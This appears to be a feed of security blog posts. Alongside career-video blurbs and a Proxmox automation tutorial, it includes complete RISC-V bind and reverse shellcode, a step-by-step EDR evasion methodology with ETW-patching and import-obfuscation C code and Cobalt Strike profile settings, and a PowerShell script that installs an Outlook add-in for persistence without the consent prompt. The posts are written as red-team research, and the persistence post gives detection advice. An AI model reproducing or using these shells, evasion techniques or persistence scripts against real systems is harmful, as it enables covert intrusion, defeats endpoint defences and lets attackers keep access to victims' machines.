Normal view

There are new articles available, click to refresh the page.
Before yesterdayPentest/Red Team

What does an ICS security practitioner do? | Cybersecurity Career Series

By: Infosec
9 May 2022 at 07:00

Industrial control system (ICS) security practitioners are responsible for securing mission-critical SCADA and ICS information systems. They are responsible for restricting digital and physical access to ICS devices, such as PLCs and RTUs, to maximize system uptime and availability. Extensive knowledge of OT and IT protocols, incident response, Linux and Windows OS, configuration management, air-gapped or closed networks, insider threats and physical security controls are important competencies for any ICS security practitioner.

– Free cybersecurity training resources: https://www.infosecinstitute.com/free
– Learn more about ICS security practitioners: https://www.infosecinstitute.com/skills/train-for-your-role/ics-security/

O:00 - ICS security practitioners 
0:25 - What is an industrial control system practitioner?
2:22 - How to become an ICS practitioner 
4:00 - Education required for an ICS practitioner 
5:00 - Soft skills ICS practitioners need
6:05 - Common tools ICS practitioners use 
7:59 - Where do ICS practitioners work? 
10:05 - Can I move to another role after ICS practitioner? 
12:18 - Getting started as an ICS practitioner 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Shellcode: Linux on RISC-V 64-Bit

By: odzhan
2 May 2022 at 20:28

RISC-V (pronounced “risk-five” ) is an open standard instruction set architecture (ISA) based on established reduced instruction set computer (RISC) principles. Unlike most other ISA designs, RISC-V is provided under open source licenses that do not require fees to use.

To learn more about the RISC-V architecture, I recently bought a StarFive VisionFive Single Board computer. It’s slightly more expensive than the RPI that runs on ARM, but it’s the closest thing to an RPI we have available right now. It uses the SiFive’s U74 64-bit RISC-V processor core which is similar to the ARM Cortex-A55. Readers without access to a board like this have the option of using QEMU.

You can view the shellcodes here.

The RISC-V ISA (excluding extensions) is of course much smaller than the ARM ISA, but that also makes it easier to learn IMHO. The reduced set of instructions is more suitable for beginners learning their first assembly language. From a business perspective, and I accept I’m not an expert on such issues, the main advantages of RISC-V over ARM is that it’s open source, has no licensing fees and is sanction-free. For those reasons, it may very well become more popular than ARM in future. We’ll have to wait and see.

  X86 (AMD64) ARM64 RISC-V 64
Registers RAX-R15 X0-X31 A0-A31
Syscall Register RAX X8 A7
Return Register RAX X0 A0
Zero Register N/A XMR X0
Relative Addressing LEA ADR LA
Data Transfer (Register) MOV MOV MV
Data Transfer (Immediate) MOV MOV LI
Execute System Call SYSCALL SVC ECALL

Execute /bin/sh

    # 48 bytes
 
    .include "include.inc"

    .global _start
    .text

_start:
    # execve("/bin/sh", NULL, NULL);
    li     a7, SYS_execve
    mv     a2, x0           # NULL
    mv     a1, x0           # NULL
    li     a3, BINSH        # "/bin/sh"
    sd     a3, (sp)         # stores string on stack
    mv     a0, sp
    ecall

Execute Command

    # 112 bytes

    .include "include.inc"
    
    .global _start
    .text

_start:
    # execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    addi   sp, sp, -64           # allocate 64 bytes of stack
    li     a7, SYS_execve
    li     a0, BINSH             # a0 = "/bin/sh\0"
    sd     a0, (sp)              # store "/bin/sh" on the stack
    mv     a0, sp
    li     a1, 0x632D            # a1 = "-c"
    sd     a1, 8(sp)             # store "-c" on the stack
    addi   a1, sp, 8
    la     a2, cmd               # a2 = cmd
    sd     a0, 16(sp)
    sd     a1, 24(sp)
    sd     a2, 32(sp)
    sd     x0, 40(sp)
    addi   a1, sp, 16            # a1 = {"/bin/sh", "-c", cmd, NULL}
    mv     a2, x0                # penv = NULL
    ecall 
cmd:
    .asciz "echo Hello, World!"

Bind Shell

    # 176 bytes
 
    .include "include.inc"

    .equ PORT, 1234

    .global _start
    .text

_start:
    addi   sp, sp, -16
    
    # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    li     a7, SYS_socket
    li     a2, IPPROTO_IP
    li     a1, SOCK_STREAM
    li     a0, AF_INET
    ecall
    
    mv     a3, a0
    
    # bind(s, &sa, sizeof(sa));  
    li     a7, SYS_bind
    li     a2, 16
    li     a1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET) 
    sd     a1, (sp)
    sd     x0, 8(sp)
    mv    a1, sp
    ecall
  
    # listen(s, 1);
    li     a7, SYS_listen
    li     a1, 1
    mv     a0, a3
    ecall
    
    # r = accept(s, 0, 0);
    li     a7, SYS_accept
    mv     a2, x0
    mv     a1, x0
    mv     a0, a3
    ecall
    
    mv     a4, a0
 
    # in this order
    #
    # dup3(s, STDERR_FILENO, 0);
    # dup3(s, STDOUT_FILENO, 0);
    # dup3(s, STDIN_FILENO,  0);
    li     a7, SYS_dup3
    li     a1, STDERR_FILENO + 1
c_dup:
    mv     a0, a4
    addi   a1, a1, -1
    ecall
    bne    a1, zero, c_dup

    # execve("/bin/sh", NULL, NULL);
    li     a7, SYS_execve
    mv     a2, x0
    mv     a1, x0
    li     a0, BINSH
    sd     a0, (sp)
    mv     a0, sp
    ecall

Reverse Connect Shell

    # 140 bytes

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F # 127.0.0.1

    .global _start
    .text

_start:
    addi    sp, sp, -16
    
    # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    li      a7, SYS_socket
    li      a2, IPPROTO_IP
    li      a1, SOCK_STREAM
    li      a0, AF_INET
    ecall
    
    mv      a3, a0       # a3 = s
    
    # connect(s, &sa, sizeof(sa));
    li      a7, SYS_connect
    li      a2, 16
    li      a1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    sd      a1, (sp)
    mv      a1, sp       # a1 = &sa 
    ecall
  
    # in this order
    #
    # dup3(s, STDERR_FILENO, 0);
    # dup3(s, STDOUT_FILENO, 0);
    # dup3(s, STDIN_FILENO,  0);
    li      a7, SYS_dup3
    li      a1, STDERR_FILENO + 1
c_dup:
    mv      a2, x0
    mv      a0, a3
    addi    a1, a1, -1
    ecall
    bne     a1, zero, c_dup

    # execve("/bin/sh", NULL, NULL);
    li      a7, SYS_execve
    li      a0, BINSH
    sd      a0, (sp)
    mv      a0, sp
    ecall

Further Reading

A public discussion about privacy careers: Training, certification and experience | Cyber Work Live

By: Infosec
2 May 2022 at 07:00

Join Infosec Skills authors Chris Stevens, John Bandler and Ralph O’Brien as they discuss the intersection of privacy and cybersecurity. They’ll help you walk a path that will lead to an engaging career as a privacy specialist — a job role that grows with more opportunities year after year!

This episode was recorded live on April 12, 2022. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here: https://www.infosecinstitute.com/events/.

0:00 - Intro and guests
3:45 - What is privacy as a career? 
8:15 - Day-to-day work of a cybersecurity privacy professional?
16:45 - Intersection of law and tech degrees
20:30 - What beginner privacy certifications should I pursue? 
25:45 - Best practices for studying for IAPP certifications
33:00 - How to gain experience in cybersecurity privacy work
40:27 - How to interview for a cybersecurity privacy job
45:00 - GDPR and ransomware 
51:52 - Implementation of privacy laws and security positions 
58:15 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

What does a security engineer do? | Cybersecurity Career Series

By: Infosec
25 April 2022 at 07:00

Security engineers are responsible for implementing, and continuously monitoring security controls that protect computer assets, networks and organizational data. They often design security architecture and develop technical solutions to mitigate and automate security-related tasks. Technical knowledge of network/web protocols, infrastructure, authentication, log management and multiple operating systems and databases is critical to success in this role.

– Free cybersecurity training resources: https://www.infosecinstitute.com/free
– Learn more: https://www.infosecinstitute.com/skills/learning-paths/security-engineering/

0:00 - What is a security engineer? 
3:39 - How do I become a security engineer? 
4:52 - Studying to become a security engineer
5:47 - Soft skills for security engineers
7:05 - Where do security engineers work? 
9:43 - Tools for security engineers
12:10 - Roles adjacent to security engineer 
13:15 - Become a security engineer right now

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

A blueprint for evading industry leading endpoint protection in 2022

By: vivami
18 April 2022 at 00:00

About two years ago I quit being a full-time red team operator. However, it still is a field of expertise that stays very close to my heart. A few weeks ago, I was looking for a new side project and decided to pick up an old red teaming hobby of mine: bypassing/evading endpoint protection solutions.

In this post, I’d like to lay out a collection of techniques that together can be used to bypassed industry leading enterprise endpoint protection solutions. This is purely for educational purposes for (ethical) red teamers and alike, so I’ve decided not to publicly release the source code. The aim for this post is to be accessible to a wide audience in the security industry, but not to drill down to the nitty gritty details of every technique. Instead, I will refer to writeups of others that deep dive better than I can.

In adversary simulations, a key challenge in the “initial access” phase is bypassing the detection and response capabilities (EDR) on enterprise endpoints. Commercial command and control frameworks provide unmodifiable shellcode and binaries to the red team operator that are heavily signatured by the endpoint protection industry and in order to execute that implant, the signatures (both static and behavioural) of that shellcode need to be obfuscated.

In this post, I will cover the following techniques, with the ultimate goal of executing malicious shellcode, also known as a (shellcode) loader:

  1. Shellcode encryption
  2. Reducing entropy
  3. Escaping the (local) AV sandbox
  4. Import table obfuscation
  5. Disabling Event Tracing for Windows (ETW)
  6. Evading common malicious API call patterns
  7. Direct system calls and evading “mark of the syscall”
  8. Removing hooks in ntdll.dll
  9. Spoofing the thread call stack
  10. In-memory encryption of beacon
  11. A custom reflective loader
  12. OpSec configurations in your Malleable profile

1. Shellcode encryption

Let’s start with a basic but important topic, static shellcode obfuscation. In my loader, I leverage a XOR or RC4 encryption algorithm, because it is easy to implement and doesn’t leave a lot of external indicators of encryption activities performed by the loader. AES encryption to obfuscate static signatures of the shellcode leaves traces in the import address table of the binary, which increase suspicion. I’ve had Windows Defender specifically trigger on AES decryption functions (e.g. CryptDecrypt, CryptHashData, CryptDeriveKey etc.) in earlier versions of this loader.

Output of dumpbin /imports, an easy giveaway of only AES decryption functions being used in the binary.

2. Reducing entropy

Many AV/EDR solutions consider binary entropy in their assessment of an unknown binary. Since we’re encrypting the shellcode, the entropy of our binary is rather high, which is a clear indicator of obfuscated parts of code in the binary.

There are several ways of reducing the entropy of our binary, two simple ones that work are:

  1. Adding low entropy resources to the binary, such as (low entropy) images.
  2. Adding strings, such as the English dictionary or some of "strings C:\Program Files\Google\Chrome\Application\100.0.4896.88\chrome.dll" output.

A more elegant solution would be to design and implement an algorithm that would obfuscate (encode/encrypt) the shellcode into English words (low entropy). That would kill two birds with one stone.

3. Escaping the (local) AV sandbox

Many EDR solutions will run the binary in a local sandbox for a few seconds to inspect its behaviour. To avoid compromising on the end user experience, they cannot afford to inspect the binary for longer than a few seconds (I’ve seen Avast taking up to 30 seconds in the past, but that was an exception). We can abuse this limitation by delaying the execution of our shellcode. Simply calculating a large prime number is my personal favourite. You can go a bit further and deterministically calculate a prime number and use that number as (a part of) the key to your encrypted shellcode.

4. Import table obfuscation

You want to avoid suspicious Windows API (WINAPI) from ending up in our IAT (import address table). This table consists of an overview of all the Windows APIs that your binary imports from other system libraries. A list of suspicious (oftentimes therefore inspected by EDR solutions) APIs can be found here. Typically, these are VirtualAlloc, VirtualProtect, WriteProcessMemory, CreateRemoteThread, SetThreadContext etc. Running dumpbin /exports <binary.exe> will list all the imports. For the most part, we’ll use Direct System calls to bypass both EDR hooks (refer to section 7) of suspicious WINAPI calls, but for less suspicious API calls this method works just fine.

We add the function signature of the WINAPI call, get the address of the WINAPI in ntdll.dll and then create a function pointer to that address:

typedef BOOL (WINAPI * pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
pVirtualProtect fnVirtualProtect;

unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
unsigned char sKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };

fnVirtualProtect = (pVirtualProtect) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR)sVirtualProtect);
// call VirtualProtect
fnVirtualProtect(address, dwSize, PAGE_READWRITE, &oldProt);

Obfuscating strings using a character array cuts the string up in smaller pieces making them more difficult to extract from a binary.

The call will still be to an ntdll.dll WINAPI, and will not bypass any hooks in WINAPIs in ntdll.dll, but is purely to remove suspicious functions from the IAT.

5. Disabling Event Tracing for Windows (ETW)

Many EDR solutions leverage Event Tracing for Windows (ETW) extensively, in particular Microsoft Defender for Endpoint (formerly known as Microsoft ATP). ETW allows for extensive instrumentation and tracing of a process’ functionality and WINAPI calls. ETW has components in the kernel, mainly to register callbacks for system calls and other kernel operations, but also consists of a userland component that is part of ntdll.dll (ETW deep dive and attack vectors). Since ntdll.dll is a DLL loaded into the process of our binary, we have full control over this DLL and therefore the ETW functionality. There are quite a few different bypasses for ETW in userspace, but the most common one is patching the function EtwEventWrite which is called to write/log ETW events. We fetch its address in ntdll.dll, and replace its first instructions with instructions to return 0 (SUCCESS).

void disableETW(void) {
	// return 0
	unsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3};     // xor rax, rax; ret
	
	ULONG oldprotect = 0;
	size_t size = sizeof(patch);
	
	HANDLE hCurrentProc = GetCurrentProcess();
	
	unsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };
	
	void *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);
	
	NtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);
	
	memcpy(pEventWrite, patch, size / sizeof(patch[0]));
	
	NtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);
	FlushInstructionCache(hCurrentProc, pEventWrite, size);
	
}

I’ve found the above method to still work on the two tested EDRs, but this is a noisy ETW patch.

6. Evading common malicious API call patterns

Most behavioural detection is ultimately based on detecting malicious patterns. One of these patters is the order of specific WINAPI calls in a short timeframe. The suspicious WINAPI calls briefly mentioned in section 4 are typically used to execute shellcode and therefore heavily monitored. However, these calls are also used for benign activity (the VirtualAlloc, WriteProcess, CreateThread pattern in combination with a memory allocation and write of ~250KB of shellcode) and so the challenge for EDR solutions is to distinguish benign from malicious calls. Filip Olszak wrote a great blog post leveraging delays and smaller chunks of allocating and writing memory to blend in with benign WINAPI call behaviour. In short, his method adjusts the following behaviour of a typical shellcode loader:

  1. Instead of allocating one large chuck of memory and directly write the ~250KB implant shellcode into that memory, allocate small contiguous chunks of e.g. <64KB memory and mark them as NO_ACCESS. Then write the shellcode in a similar chunk size to the allocated memory pages.
  2. Introduce delays between every of the above mentioned operations. This will increase the time required to execute the shellcode, but will also make the consecutive execution pattern stand out much less.

One catch with this technique is to make sure you find a memory location that can fit your entire shellcode in consecutive memory pages. Filip’s DripLoader implements this concept.

The loader I’ve built does not inject the shellcode into another process but instead starts the shellcode in a thread in its own process space using NtCreateThread. An unknown process (our binary will de facto have low prevalence) into other processes (typically a Windows native ones) is suspicious activity that stands out (recommended read “Fork&Run – you’re history”). It is much easier to blend into the noise of benign thread executions and memory operations within a process when we run the shellcode within a thread in the loader’s process space. The downside however is that any crashing post-exploitation modules will also crash the process of the loader and therefore the implant. Persistence techniques as well as running stable and reliable BOFs can help to overcome this downside.

7. Direct system calls and evading “mark of the syscall”

The loader leverages direct system calls for bypassing any hooks put in ntdll.dll by the EDRs. I want to avoid going into too much detail on how direct syscalls work, since it’s not the purpose of this post and a lot of great posts have been written about it (e.g. Outflank).

In short, a direct syscall is a WINAPI call directly to the kernel system call equivalent. Instead of calling the ntdll.dll VirtualAlloc we call its kernel equivalent NtAlocateVirtualMemory defined in the Windows kernel. This is great because we’re bypassing any EDR hooks used to monitor calls to (in this example) VirtualAlloc defined in ntdll.dll.

In order to call a system call directly, we fetch the syscall ID of the system call we want to call from ntdll.dll, use the function signature to push the correct order and types of function arguments to the stack, and call the syscall <id> instruction. There are several tools that arrange all this for us, SysWhispers2 and SysWhisper3 are two great examples. From an evasion perspective, there are two issues with calling direct system calls:

  1. Your binary ends up with having the syscall instruction, which is easy to statically detect (a.k.a “mark of the syscall”, more in “SysWhispers is dead, long live SysWhispers!”).
  2. Unlike benign use of a system call that is called through its ntdll.dll equivalent, the return address of the system call does not point to ntdll.dll. Instead, it points to our code from where we called the syscall, which resides in memory regions outside of ntdll.dll. This is an indicator of a system call that is not called through ntdll.dll, which is suspicious.

To overcome these issues we can do the following:

  1. Implement an egg hunter mechanism. Replace the syscall instruction with the egg (some random unique identifiable pattern) and at runtime, search for this egg in memory and replace it with the syscall instruction using the ReadProcessMemory and WriteProcessMemory WINAPI calls. Thereafter, we can use direct system calls normally. This technique has been implemented by klezVirus.
  2. Instead of calling the syscall instruction from our own code, we search for the syscall instruction in ntdll.dll and jump to that memory address once we’ve prepared the stack to call the system call. This will result in an return address in RIP that points to ntdll.dll memory regions.

Both techniques are part of SysWhisper3.

8. Removing hooks in ntdll.dll

Another nice technique to evade EDR hooks in ntdll.dll is to overwrite the loaded ntdll.dll that is loaded by default (and hooked by the EDR) with a fresh copy from ntdll.dll. ntdll.dll is the first DLL that gets loaded by any Windows process. EDR solutions make sure their DLL is loaded shortly after, which puts all the hooks in place in the loaded ntdll.dll before our own code will execute. If our code loads a fresh copy of ntdll.dll in memory afterwards, those EDR hooks will be overwritten. RefleXXion is a C++ library that implements the research done for this technique by MDSec. RelfeXXion uses direct system calls NtOpenSection and NtMapViewOfSection to get a handle to a clean ntdll.dll in \KnownDlls\ntdll.dll (registry path with previously loaded DLLs). It then overwrites the .TEXT section of the loaded ntdll.dll, which flushes out the EDR hooks.

I recommend to use adjust the RefleXXion library to use the same trick as described above in section 7.

9. Spoofing the thread call stack

The next two sections cover two techniques that provide evasions against detecting our shellcode in memory. Due to the beaconing behaviour of an implant, for a majority of the time the implant is sleeping, waiting for incoming tasks from its operator. During this time the implant is vulnerable for memory scanning techniques from the EDR. The first of the two evasions described in this post is spoofing the thread call stack.

When the implant is sleeping, its thread return address is pointing to our shellcode residing in memory. By examining the return addresses of threads in a suspicious process, our implant shellcode can be easily identified. In order to avoid this, want to break this connection between the return address and shellcode. We can do so by hooking the Sleep() function. When that hook is called (by the implant/beacon shellcode), we overwrite the return address with 0x0 and call the original Sleep() function. When Sleep() returns, we put the original return address back in place so the thread returns to the correct address to continue execution. Mariusz Banach has implemented this technique in his ThreadStackSpoofer project. This repo provides much more detail on the technique and also outlines some caveats.

We can observe the result of spoofing the thread call stack in the two screenshots below, where the non-spoofed call stack points to non-backed memory locations and a spoofed thread call stack points to our hooked Sleep (MySleep) function and “cuts off” the rest of the call stack.

Default beacon thread call stack.

Spoofed beacon thread call stack.

10. In-memory encryption of beacon

The other evasion for in-memory detection is to encrypt the implant’s executable memory regions while sleeping. Using the same sleep hook as described in the section above, we can obtain the shellcode memory segment by examining the caller address (the beacon code that calls Sleep() and therefore our MySleep() hook). If the caller memory region is MEM_PRIVATE and EXECUTABLE and roughly the size of our shellcode, then the memory segment is encrypted with a XOR function and Sleep() is called. Then Sleep() returns, it decrypts the memory segment and returns to it.

Another technique is to register a Vectored Exception Handler (VEH) that handles NO_ACCESS violation exceptions, decrypts the memory segments and changes the permissions to RX. Then just before sleeping, mark the memory segments as NO_ACCESS, so that when Sleep() returns, it throws a memory access violation exception. Because we registered a VEH, the exception is handled within that thread context and can be resumed at the exact same location the exception was thrown. The VEH can simply decrypt and change the permissions back to RX and the implant can continue execution. This technique prevents a detectible Sleep() hook being in place when the implant is sleeping.

Mariusz Banach has also implemented this technique in ShellcodeFluctuation.

11. A custom reflective loader

The beacon shellcode that we execute in this loader ultimately is a DLL that needs to be executed in memory. Many C2 frameworks leverage Stephen Fewer’s ReflectiveLoader. There are many well written explanations of how exactly a relfective DLL loader works, and Stephen Fewer’s code is also well documented, but in short a Reflective Loader does the following:

  1. Resolve addresses to necessary kernel32.dll WINAPIs required for loading the DLL (e.g. VirtualAlloc, LoadLibraryA etc.)
  2. Write the DLL and its sections to memory
  3. Build up the DLL import table, so the DLL can call ntdll.dll and kernel32.dll WINAPIs
  4. Load any additional library’s and resolve their respective imported function addresses
  5. Call the DLL entrypoint

Cobalt Strike added support for a custom way for reflectively loading a DLL in memory that allows a red team operator to customize the way a beacon DLL gets loaded and add evasion techniques. Bobby Cooke and Santiago P built a stealthy loader (BokuLoader) using Cobalt Strike’s UDRL which I’ve used in my loader. BokuLoader implements several evasion techniques:

  • Limit calls to GetProcAddress() (commonly EDR hooked WINAPI call to resolve a function address, as we do in section 4)
  • AMSI & ETW bypasses
  • Use only direct system calls
  • Use only RW or RX, and no RWX (EXECUTE_READWRITE) permissions
  • Removes beacon DLL headers from memory

Make sure to uncomment the two defines to leverage direct system calls via HellsGate & HalosGate and bypass ETW and AMSI (not really necessary, as we’ve already disabled ETW and are not injecting the loader into another process).

12. OpSec configurations in your Malleable profile

In your Malleable C2 profile, make sure the following options are configured, which limit the use of RWX marked memory (suspicious and easily detected) and clean up the shellcode after beacon has started.

    set startrwx        "false";
    set userwx          "false";
    set cleanup         "true";
    set stomppe         "true";
    set obfuscate       "true";
    set sleep_mask      "true";
    set smartinject     "true";

Conclusions

Combining these techniques allow you to bypass (among others) Microsoft Defender for Endpoint and CrowdStrike Falcon with 0 detections (tested mid April 2022), which together with SentinelOne lead the endpoint protection industry.

CrowdStrike Falcon with 0 alerts.

Windows Defender (and also Microsoft Defender for Endpoint, not screenshotted) with 0 alerts.

Of course this is just one and the first step in fully compromising an endpoint, and this doesn’t mean “game over” for the EDR solution. Depending on what post-exploitation activity/modules the red team operator choses next, it can still be “game over” for the implant. In general, either run BOFs, or tunnel post-ex tools through the implant’s SOCKS proxy feature. Also consider putting the EDR hooks patches back in place in our Sleep() hook to avoid detection of unhooking, as well as removing the ETW/AMSI patches.

It’s a cat and mouse game, and the cat is undoubtedly getting better.

An Outlook parasite for stealth persistence

By: vivami
9 January 2021 at 00:00

In 2019 I was researching new “stealthy” persistence techniques that were not yet published or commonly known. I was triggered by the techniques that (mis)used plugins for programs on the target’s machine. Particularly interesting targets are browsers, e-mail clients and messaging apps, as they’re typically started after boot.

While reading other’s work, I stumbled upon a blog post from @bohops about VSTOs: The Payload Installer That Probably Defeats Your Application Whitelisting Rules. He shows how to create an “evil VSTO” and install it into Office. His conclusion there however, is that an unprivileged account will get a (“ClickOnce”) pop-up from vstoinstaller.exe asking the user for permission:

Screenshot by @bohops

Bypassing this “ClickOnce” pop-up would be very valuable from an attacker perspective and so I decided to dig a bit deeper into how exactly vstoinstaller.exe installs a VSTO add-in. I fired up Procmon and filtered on vstoinstaller.exe process while clicking through this pop-up. I started by looking at the registry keys in HKCU, since I assumed that would be a key part of the installation.

2

3

These registry keys were particularly interesting and seemed very much related to the installation of the VSTO. I uninstalled the plugin again using vstoinstaller.exe /uninstall which removed those particular registry keys.

4

Installing the VSTO again using the conventional method triggers the pop-up again, so I was assuming the uninstallation performed a complete roll-back of the VSTO install.

5

Next I wrote a PowerShell script that set the correct registry keys and values to test if my Outlook add-in would be loaded by Outlook, without any user consent pop-ups. I think the trick of bypassing the “ClickOnce” pop-up eventually boils down to adding the public key of the certificate used to sign the VSTO with, in HKCU:\Software\Microsoft\VSTO\Security\Inclusion\.

function Install-OutlookAddin {
<#
    .SYNOPSIS

        Installs an Outlook add-in.
        Author: @_vivami

    .PARAMETER PayloadPath

        The path of the DLL and manifest files

    .EXAMPLE

        PS> Install-OutlookAddin -PayloadPath C:\Path\to\Addin.vsto 
#>
    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$true)]
        [string]
        $PayloadPath
    )

    $RegistryPaths = 
        @("HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension"),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata"),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}"),
        @("HKCU:\Software\Microsoft\VSTO\Security\Inclusion\1e1f0cff-ff7a-406d-bd82-e53809a5e93a")
    
    $RegistryPaths | foreach {
        if(-Not (Test-Path ($_))) {
            try {
                New-Item -Path $($_) -Force | Out-Null
            } catch {
                Write-Error "Failed to set entry $($_)."
            }
        }
    }

    $RegistryKeys = 
        @("HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension", "(Default)", ""),
        @("HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension", "Description", "Outlook Extension"),
        @("HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension", "FriendlyName", "Outlook Extension"),
        @("HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension", "Manifest", "file:///$PayloadPath"),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata", "(Default)", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata", "file:///$PayloadPath", "{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}"),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "(Default)", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "addInName", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "officeApplication", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "friendlyName", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "description", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "loadBehavior", ""),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "compatibleFrameworks", "<compatibleFrameworks xmlns=`"urn:schemas-microsoft-com:clickonce.v2`">`n`t<framework targetVersion=`"4.0`" profile=`"Full`" supportedRuntime=`"4.0.30319`" />`n`t</compatibleFrameworks>"),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}", "PreferredClr", "v4.0.30319"),
        @("HKCU:\Software\Microsoft\VSTO\Security\Inclusion\1e1f0cff-ff7a-406d-bd82-e53809a5e93a", "Url", "file:///$PayloadPath"),
        @("HKCU:\Software\Microsoft\VSTO\Security\Inclusion\1e1f0cff-ff7a-406d-bd82-e53809a5e93a", "PublicKey", "<RSAKeyValue><Modulus>yDCewQWG8XGHpxD57nrwp+EZInIMenUDOXwCFNAyKLzytOjC/H9GeYPnn0PoRSzwvQ5gAfb9goKlN3fUrncFJE8QAOuX+pqhnchgJDi4IkN7TDhatd/o8X8O5v0DBoqBVQF8Tz60DpcH55evKNRPylvD/8EG/YuWVylSwk8v5xU=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>")

    foreach ($KeyPair in $RegistryKeys) {
        New-ItemProperty -Path $KeyPair[0] -Name $KeyPair[1] -Value $KeyPair[2] -PropertyType "String" -Force | Out-Null
    }
	Write-Host "Done."
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension" -Name "Loadbehavior" -Value 0x00000003 -Type DWord | Out-Null
}


function Remove-OutlookAddin {
<#
    .SYNOPSIS

        Removes the Outlook add-in
        Author: @_vivami

    .EXAMPLE

        PS> Remove-OutlookAddin 
#>
    $RegistryPaths = 
        @("HKCU:\Software\Microsoft\Office\Outlook\Addins\OutlookExtension"),
        @("HKCU:\Software\Microsoft\VSTO\SolutionMetadata"),
        #@("HKCU:\Software\Microsoft\VSTO\SolutionMetadata\{FA2052FB-9E23-43C8-A0EF-43BBB710DC61}"),
        @("HKCU:\Software\Microsoft\VSTO\Security\Inclusion\1e1f0cff-ff7a-406d-bd82-e53809a5e93a")
    
    $RegistryPaths | foreach {
        Remove-Item -Path $($_) -Force -Recurse
    }
}

6

Sure enough, it worked! The add-in was installed and loaded by Outlook upon startup, without a pop-up.

7

Taking a look at Sysinternals’ AutoRuns, we can see that this VSTO add-in is not detected.

8

MSRC

I’ve reached out to Microsoft Security Response Center, but since this is not a breach of a security boundary, this bug does not meet the bar for servicing and will not be fixed.

Detection

To detect this persistence technique, monitor “RegistryEvent Value Set”-events (Sysmon Event ID 13) on the following paths:

HKCU:\Software\Microsoft\Office\Outlook\Addins\
HKCU:\Software\Microsoft\Office\Word\Addins\
HKCU:\Software\Microsoft\Office\Excel\Addins\
HKCU:\Software\Microsoft\Office\Powerpoint\Addins\
HKCU:\Software\Microsoft\VSTO\Security\Inclusion\

You can try all of this yourself with the PoC code on my GitHub repo.

Automating Proxmox with Terraform and Ansible

By: vivami
30 December 2020 at 00:00

During the hoidays I played around a bit with automating parts of my Proxmox homeserver setup. It consists of various LXC containers (CT) and Virtual Machines (VMs) for dedicated tasks and while I don’t regularly setup new containers and VMs, it’d be nice to have an quick and automated way of doing so.

For this automation I created a simple configuration that provisions a VM or CT using Terraform and Ansible. Telemate developed a Terraform provider that maps Terraform functionality to the Proxmox API, so start by defining the use of that provider in version.tf.

terraform {
  required_providers {
    proxmox = {
      source = "Telmate/proxmox"
      version = "2.6.6"
    }
  }
}

In main.tf I’ve defined the variables for the Telemate Proxmox provider, for which the values of these are assigned in var.tf.

provider "proxmox" {
    pm_api_url = var.proxmox_host["pm_api_url"]
    pm_user = var.proxmox_host["pm_user"]
    pm_tls_insecure = true
}

